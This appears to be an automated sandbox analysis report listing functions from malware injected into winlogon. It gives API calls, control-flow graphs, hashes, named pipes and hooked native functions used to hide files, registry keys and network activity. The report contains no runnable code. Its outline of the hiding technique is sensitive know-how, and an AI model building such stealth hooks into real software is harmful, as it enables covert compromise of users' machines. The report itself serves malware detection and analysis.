                        Function 000002E9917539E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Virtual$AllocQuery
                        • String ID:
                        • API String ID: 31662377-0
                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction ID: bd37eb1f9fe1cce81840bdfd23b72ab3f02b45a8b3f74b5eeca5040b27afc49a
                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction Fuzzy Hash: 07315022759AC581EA70DA17E05835E67A4F388784F11052BF5CE06BBADF7CC2C08F20
                        Function 000002E99175328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: 351c7813d095973389ab4a2bf15dbcd6c7863a8031ac115e2cdad26015686c69
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 56118031B946C382FB60AB33F84D76922A4B754345F92412FA916816B3EF79C0C48E70
                        Function 000002E991754DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                        • String ID:
                        • API String ID: 3733156554-0
                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction ID: d4000fd86275b36a03d69cb5381fd848dff25b8e8b72ec9c6e4ac05b9341f0d5
                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction Fuzzy Hash: DCF0302625CB85C0D631DB02E44934A6BA0F38C7D4F55011AFA8E03B6ADB3CC6C08F50
                        Function 000002E99172273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 265 2e99172273c-2e9917227a4 call 2e9917229d4 * 4 274 2e9917227aa-2e9917227ad 265->274 275 2e9917229b2 265->275 274->275 276 2e9917227b3-2e9917227b6 274->276 277 2e9917229b4-2e9917229d0 275->277 276->275 278 2e9917227bc-2e9917227bf 276->278 278->275 279 2e9917227c5-2e9917227e6 VirtualAlloc 278->279 279->275 280 2e9917227ec-2e99172280c 279->280 281 2e99172280e-2e991722836 280->281 282 2e991722838-2e99172283f 280->282 281->281 281->282 283 2e9917228df-2e9917228e6 282->283 284 2e991722845-2e991722852 282->284 285 2e9917228ec-2e991722901 283->285 286 2e991722992-2e9917229b0 283->286 284->283 287 2e991722858-2e99172286a LoadLibraryA 284->287 285->286 288 2e991722907 285->288 286->277 289 2e99172286c-2e991722878 287->289 290 2e9917228ca-2e9917228d2 287->290 293 2e99172290d-2e991722921 288->293 294 2e9917228c5-2e9917228c8 289->294 290->287 291 2e9917228d4-2e9917228d9 290->291 291->283 296 2e991722923-2e991722934 293->296 297 2e991722982-2e99172298c 293->297 294->290 295 2e99172287a-2e99172287d 294->295 301 2e99172287f-2e9917228a5 295->301 302 2e9917228a7-2e9917228b7 295->302 299 2e99172293f-2e991722943 296->299 300 2e991722936-2e99172293d 296->300 297->286 297->293 304 2e99172294d-2e991722951 299->304 305 2e991722945-2e99172294b 299->305 303 2e991722970-2e991722980 300->303 306 2e9917228ba-2e9917228c1 301->306 302->306 303->296 303->297 307 2e991722963-2e991722967 304->307 308 2e991722953-2e991722961 304->308 305->303 306->294 307->303 310 2e991722969-2e99172296c 307->310 308->303 310->303
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: AllocLibraryLoadVirtual
                        • String ID:
                        • API String ID: 3550616410-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 0174b3c931968c58cb23d2eb9d8b9e4d39f5b79fd9c5245184543cdb20c18685
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: A4616872B422D187DB54CF16C00872D7392F754BE4F19852ADF991778ADA38D893CB20
                        Function 000002E991751ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 000002E991751628: GetProcessHeap.KERNEL32 ref: 000002E991751633
                          • Part of subcall function 000002E991751628: HeapAlloc.KERNEL32 ref: 000002E991751642
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516B2
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516DF
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917516F9
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751719
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751734
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751754
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E99175176F
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E99175178F
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917517AA
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517CA
                        • Sleep.KERNEL32 ref: 000002E991751AD7
                        • SleepEx.KERNELBASE ref: 000002E991751ADD
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917517E5
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751805
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751820
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751840
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E99175185B
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E99175187B
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751896
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917518A0
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: 98a2260962f66e790094138e64364fcbcff5423d27e2e98684da735ba5be122f
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: 3731F1613816C342FF509B27D6493A913A4BB44BC6F0A542B9E1B87697FF34C8D1CA31

                        Non-executed Functions

                        Function 000002E991752B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 575 2e991752b2c-2e991752ba5 call 2e991772ce0 578 2e991752ee0-2e991752f03 575->578 579 2e991752bab-2e991752bb1 575->579 579->578 580 2e991752bb7-2e991752bba 579->580 580->578 581 2e991752bc0-2e991752bc3 580->581 581->578 582 2e991752bc9-2e991752bd9 GetModuleHandleA 581->582 583 2e991752bed 582->583 584 2e991752bdb-2e991752beb GetProcAddress 582->584 585 2e991752bf0-2e991752c0e 583->585 584->585 585->578 587 2e991752c14-2e991752c33 StrCmpNIW 585->587 587->578 588 2e991752c39-2e991752c3d 587->588 588->578 589 2e991752c43-2e991752c4d 588->589 589->578 590 2e991752c53-2e991752c5a 589->590 590->578 591 2e991752c60-2e991752c73 590->591 592 2e991752c75-2e991752c81 591->592 593 2e991752c83 591->593 594 2e991752c86-2e991752c8a 592->594 593->594 595 2e991752c9a 594->595 596 2e991752c8c-2e991752c98 594->596 597 2e991752c9d-2e991752ca7 595->597 596->597 598 2e991752d9d-2e991752da1 597->598 599 2e991752cad-2e991752cb0 597->599 600 2e991752da7-2e991752daa 598->600 601 2e991752ed2-2e991752eda 598->601 602 2e991752cc2-2e991752ccc 599->602 603 2e991752cb2-2e991752cbf call 2e99175199c 599->603 604 2e991752dac-2e991752db8 call 2e99175199c 600->604 605 2e991752dbb-2e991752dc5 600->605 601->578 601->591 607 2e991752cce-2e991752cdb 602->607 608 2e991752d00-2e991752d0a 602->608 603->602 604->605 612 2e991752df5-2e991752df8 605->612 613 2e991752dc7-2e991752dd4 605->613 607->608 615 2e991752cdd-2e991752cea 607->615 609 2e991752d3a-2e991752d3d 608->609 610 2e991752d0c-2e991752d19 608->610 617 2e991752d3f-2e991752d49 call 2e991751bbc 609->617 618 2e991752d4b-2e991752d58 lstrlenW 609->618 610->609 616 2e991752d1b-2e991752d28 610->616 621 2e991752dfa-2e991752e03 call 2e991751bbc 612->621 622 2e991752e05-2e991752e12 lstrlenW 612->622 613->612 620 2e991752dd6-2e991752de3 613->620 623 2e991752ced-2e991752cf3 615->623 626 2e991752d2b-2e991752d31 616->626 617->618 633 2e991752d93-2e991752d98 617->633 628 2e991752d5a-2e991752d64 618->628 629 2e991752d7b-2e991752d8d call 2e991753844 618->629 630 2e991752de6-2e991752dec 620->630 621->622 641 2e991752e4a-2e991752e55 621->641 624 2e991752e35-2e991752e3f call 2e991753844 622->624 625 2e991752e14-2e991752e1e 622->625 632 2e991752cf9-2e991752cfe 623->632 623->633 635 2e991752e42-2e991752e44 624->635 625->624 634 2e991752e20-2e991752e33 call 2e99175152c 625->634 626->633 636 2e991752d33-2e991752d38 626->636 628->629 639 2e991752d66-2e991752d79 call 2e99175152c 628->639 629->633 629->635 640 2e991752dee-2e991752df3 630->640 630->641 632->608 632->623 633->635 634->624 634->641 635->601 635->641 636->609 636->626 639->629 639->633 640->612 640->630 646 2e991752ecc-2e991752ed0 641->646 647 2e991752e57-2e991752e5b 641->647 646->601 651 2e991752e5d-2e991752e61 647->651 652 2e991752e63-2e991752e7d call 2e9917585c0 647->652 651->652 654 2e991752e80-2e991752e83 651->654 652->654 657 2e991752ea6-2e991752ea9 654->657 658 2e991752e85-2e991752ea3 call 2e9917585c0 654->658 657->646 660 2e991752eab-2e991752ec9 call 2e9917585c0 657->660 658->657 660->646
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: 9267f257902aa87408aaac54b14cc2c1c9bedbda9888c08ae2a81d07cc4cf480
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 49B19F22250BD2C6EB698F27D4487A963A5F748B84F56501FEE0953796EF35CCC0CB60
                        Function 000002E991757D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: 0216bfbab142289af890d8c45534b75c134c54bc5fdd387169f2726022cc0a09
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: F6318372245BC19AEB609F62E8443ED7364F784744F85402EEB4D97B95EF38C588CB20
                        Function 000002E99175D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: a23a05519f5be50e9521a24267438afb78831fdbfdb93237bbf99c1e24bec194
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: C0319332254FC196EB60DF26E84439E73A4F789794F91012AEA9D43B96DF38C185CF10
                        Function 000002E9917512BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: faf9fcae4cad09d4b21471a3c83bc15139729c09b9c22fc87df00bbc9025f63a
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: B3516D72240BC5C6EB54CF62E44835AB7A1F389FC9F85412AEA4A8771ADF3CC085CB51
                        Function 000002E991751D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 4753043bf12ce9e32f38f3c1a54f8f46ce1ac6560c3b79c386cbf99cf72d279c
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: FA31D664191ACBA1FB00EFA7E85D6D42320B710384FC3101B945A461B79F3886CACF71
                        Function 000002E991726910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 417 2e991726910-2e991726916 418 2e991726951-2e99172695b 417->418 419 2e991726918-2e99172691b 417->419 420 2e991726a78-2e991726a8d 418->420 421 2e99172691d-2e991726920 419->421 422 2e991726945-2e991726984 call 2e991726fc0 419->422 425 2e991726a9c-2e991726ab6 call 2e991726e54 420->425 426 2e991726a8f 420->426 423 2e991726922-2e991726925 421->423 424 2e991726938 __scrt_dllmain_crt_thread_attach 421->424 437 2e99172698a-2e99172699f call 2e991726e54 422->437 438 2e991726a52 422->438 429 2e991726931-2e991726936 call 2e991726f04 423->429 430 2e991726927-2e991726930 423->430 433 2e99172693d-2e991726944 424->433 440 2e991726aef-2e991726b20 call 2e991727190 425->440 441 2e991726ab8-2e991726aed call 2e991726f7c call 2e991726e1c call 2e991727318 call 2e991727130 call 2e991727154 call 2e991726fac 425->441 431 2e991726a91-2e991726a9b 426->431 429->433 450 2e991726a6a-2e991726a77 call 2e991727190 437->450 451 2e9917269a5-2e9917269b6 call 2e991726ec4 437->451 442 2e991726a54-2e991726a69 438->442 452 2e991726b31-2e991726b37 440->452 453 2e991726b22-2e991726b28 440->453 441->431 450->420 470 2e991726a07-2e991726a11 call 2e991727130 451->470 471 2e9917269b8-2e9917269dc call 2e9917272dc call 2e991726e0c call 2e991726e38 call 2e99172ac0c 451->471 454 2e991726b39-2e991726b43 452->454 455 2e991726b7e-2e991726b94 call 2e99172268c 452->455 453->452 459 2e991726b2a-2e991726b2c 453->459 460 2e991726b4f-2e991726b5d call 2e991735780 454->460 461 2e991726b45-2e991726b4d 454->461 478 2e991726bcc-2e991726bce 455->478 479 2e991726b96-2e991726b98 455->479 466 2e991726c1f-2e991726c2c 459->466 467 2e991726b63-2e991726b78 call 2e991726910 460->467 482 2e991726c15-2e991726c1d 460->482 461->467 467->455 467->482 470->438 490 2e991726a13-2e991726a1f call 2e991727180 470->490 471->470 519 2e9917269de-2e9917269e5 __scrt_dllmain_after_initialize_c 471->519 480 2e991726bd0-2e991726bd3 478->480 481 2e991726bd5-2e991726bea call 2e991726910 478->481 479->478 487 2e991726b9a-2e991726bbc call 2e99172268c call 2e991726a78 479->487 480->481 480->482 481->482 499 2e991726bec-2e991726bf6 481->499 482->466 487->478 512 2e991726bbe-2e991726bc6 call 2e991735780 487->512 508 2e991726a21-2e991726a2b call 2e991727098 490->508 509 2e991726a45-2e991726a50 490->509 505 2e991726c01-2e991726c11 call 2e991735780 499->505 506 2e991726bf8-2e991726bff 499->506 505->482 506->482 508->509 520 2e991726a2d-2e991726a3b 508->520 509->442 512->478 519->470 521 2e9917269e7-2e991726a04 call 2e99172abc8 519->521 520->509 521->470
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: e16fa48834a59c6cd4a499f0462a1a18f190ef002cbaf03bf6bfe41264d5c29d
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 9F81A4617822C386FB50AB27D44939922A1FB99780F96482FBD4547797DB38C9C78F30
                        Function 000002E99175CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 000002E99175CE37
                        • FlsGetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE4C
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE6D
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE9A
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CEAB
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CEBC
                        • SetLastError.KERNEL32 ref: 000002E99175CED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,000002E99175ECCC,?,?,?,?,000002E99175BF9F,?,?,?,?,?,000002E991757AB0), ref: 000002E99175CF2C
                          • Part of subcall function 000002E99175D6CC: HeapAlloc.KERNEL32 ref: 000002E99175D721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF54
                          • Part of subcall function 000002E99175D744: HeapFree.KERNEL32 ref: 000002E99175D75A
                          • Part of subcall function 000002E99175D744: GetLastError.KERNEL32 ref: 000002E99175D764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF76
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: d19b245fd988bfb2817d68be97438e53c8424c1f9c669e008c2cccf14dbdb104
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: 734174203C12C742FA69A737D55D3692289BB447B4F160B2FA936466E7DF3884C19F30
                        Function 000002E991752244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 2ec8cc7cd3fe4d2c1af7483aaecc8ed615e3356d440049c4b66141594478c441
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: F4214F32654781C3FB108B26F44875973A1F789BE4F91021AEA5943BA9DF3CC589CF51
                        Function 000002E99175A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: 97f73203f8982477833e52015e33f754f7e99079407345b81d307e64eaf0c1f0
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: C1E18F72644BC28AEB20DF66D4883AD77A0F745798F12112BEE8957B97CB34D5C1CB20
                        Function 000002E991729944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: 920fc7fd0e7b6407fb21e7a3f32b8b7f41c9ae5ea962bf932353d45c49382d83
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: BAE1C1326427D286EB60CF26D4883AD77A0F749788F15091AEE8947B9BCF34C1D2CB10
                        Function 000002E99175F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: a37450bc1c151caee95b075b815692e99cd55a6f4dc24f28fbba06317fb40626
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 2741D622391B8292FB56CB17E8087562795B745BE0F47492F9D0E87786EF3CC4C58B60
                        Function 000002E99175104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: c14a8d93c31946622ec18366339607f616fe7fb0c74b8ef5f7eef75a911a86bd
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: A0419133214BC5C6E760CF22E44879EB7A1F388B89F44812AEA8A47759DF38C485CB50
                        Function 000002E99175D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
